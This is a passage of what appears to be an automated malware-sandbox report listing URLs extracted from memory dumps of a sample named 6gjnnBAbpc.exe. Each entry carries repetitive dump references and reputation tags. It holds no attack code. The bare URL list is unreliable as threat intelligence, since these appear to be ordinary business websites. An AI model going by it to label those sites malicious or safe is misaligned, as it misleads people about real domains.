6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://www.myropcb.com/why-use-myro/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.pwd.org/r6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.06gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.com-sit.com/wp-content/themes/betheme/js/plugins/chart.min.js?ver=26.66gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://myropcb.com/login/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.winhui.cn/template/default/img/fixedimg4.png6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.2print.com/ows6gjnnBAbpc.exe, 00000000.00000003.541644017.0000000008D3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-300x110.jpg6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.10.36gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.46gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.myropcb.com/why-use-myro/terms-of-service/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 